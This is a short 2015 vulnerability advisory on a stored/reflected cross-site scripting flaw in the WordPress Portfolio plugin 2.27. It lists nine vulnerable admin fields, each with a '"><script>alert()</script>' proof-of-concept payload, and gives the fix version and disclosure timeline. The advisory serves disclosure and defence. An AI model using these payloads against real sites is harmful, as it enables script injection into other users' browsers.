WordPress Portfolio 2.27 Cross Site Scripting
Posted on 17 December 2015
Plugin Name : Portfolio Effected Version : 2.27 (and most probably lower version's if any) Vulnerability : A3-Cross-Site Scripting (XSS) Identified by : Madhu Akula Technical Details Minimum Level of Access Required : Administrator PoC - (Proof of Concept) : The following fields put the payload as below http://localhost/wp-admin/admin.php?page=portfolio.php tag-slug = “><script>alert(1)</script> prtfl_date_text_field = “><script>alert(2)</script> prtfl_link_text_field = “><script>alert(3)</script> prtfl_shrdescription_text_field = “><script>alert(4)</script> prtfl_description_text_field = “><script>alert(5)</script> prtfl_svn_text_field = “><script>alert(6)</script> prtfl_executor_text_field = “><script>alert(7)</script> prtfl_screenshot_text_field = “><script>alert(8)</script> prtfl_technologies_text_field = “><script>alert(9)</script> Vulnerable Parameter : tag-slug, prtfl_date_text_field, prtfl_link_text_field, prtfl_shrdescription_text_field, prtfl_description_text_field, prtfl_svn_text_field, prtfl_executor_text_field, prtfl_screenshot_text_field, prtfl_technologies_text_field Type of XSS : Reflected / Stored Fixed in : 2.28 http://wordpress.org/plugins/portfolio/changelog/ Disclosure Timeline Vendor Contacted : 2014-08-04 Plugin Status : Updated on 2014-08-07 Public Disclosure : October 3, 2015 CVE Number : Not assigned yet Plugin Description : With the Portfolio plugin you can create a unique page for displaying portfolio items consisting of screenshots and additional information such as description, short description, URL, date of completion, etc. Moreover you can add not just one, but many screenshots to one portfolio item for better visual guidance.